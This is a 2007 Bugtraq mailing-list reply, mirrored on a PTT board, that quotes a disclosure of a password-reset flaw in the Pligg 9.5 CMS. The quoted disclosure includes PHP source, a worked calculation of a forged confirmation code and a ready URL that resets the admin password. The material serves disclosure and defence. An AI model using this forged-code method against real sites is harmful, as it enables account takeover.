閱讀文章 - 看板 Bugtraq - 批踢踢實業坊

發信人i.m.crazy.frog@gmail.com ("crazy frog crazy frog"),

看板Bugtraq

標題Re: Pligg critical vulnerability

發信站NCTU CSIE FreeBSD Server (Sun May 27 07:29:13 2007)

轉信站ptt!FreeBSD.csie.NCTU!not-for-mail

have you notified to the pligg developers?i think they have well defined policy for discloser? On 5/25/07, 242th section <242th.section@gmail.com> wrote: > Pligg critical vulnerability > > Concerned version : 9.5 and ? > > Description : > > Pligg is a flexible CMS based on PHP and MYSQL. > > To reinitialize a forgotten password, Pligg follows a classical > process. A confirmation code is generated and sent by email to the > concerned user mail box. The user has to follow the link containing > the confirmation code and if the confirmation code is checked > successfully, the password is reinitialized to a pre-defined value. > > > you can find a part of the source code in charge of this check below : > > > WEB_ROOT/libs/html1.php > > > [=85] > > function generateHash($plainText, $salt =3D null){ > > if ($salt =3D=3D=3D null) { > > $salt =3D substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); } > > else { > > $salt =3D substr($salt, 0, SALT_LENGTH); > > } > > return $salt . sha1($salt . $plainText); > > } > > [=85] > > > > WEB_ROOT/login.php : > > > [=85] > > $confirmationcode =3D $_GET["confirmationcode"]; > > if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) > =3D=3D $confirmationcode){ > > $db->query('UPDATE `' . table_users . '` SET `user_pass` =3D > "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` > =3D "'.$username.'"'); > > [=85] > > > > Unfortunately, as you can read, you can easily generate, for a given > username, a confirmation code that passes successfully the following > check "if(generateHash($username, substr($confirmationcode, 0, > SALT_LENGTH)) =3D=3D $confirmationcode)" > > > Example : > > > Let's choose : > salt =3D 123456789 > > and, > > username =3D admin > > we have : > > sha1(123456789admin) =3D 1e2f566cbda0a9c855240bf21b8bae030404cad7 > > and thus : > > confirmationcode =3D 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 > > with the following url you can reinitialize the user admin password : > > > http://www.domain.com/login.php?processlogin=3D4&username=3Dadmin&confirm= ationcode=3D1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 > > > 242th.section. > --=20 --------------------------------------- http://www.secgeeks.com get a blog on SecGeeks :) register here:- http://secgeeks.com/user/register rss feeds :- http://secradar.com/node/feed http://www.newskicks.com Submit and kick for new stories from all around the world. ---------------------------------------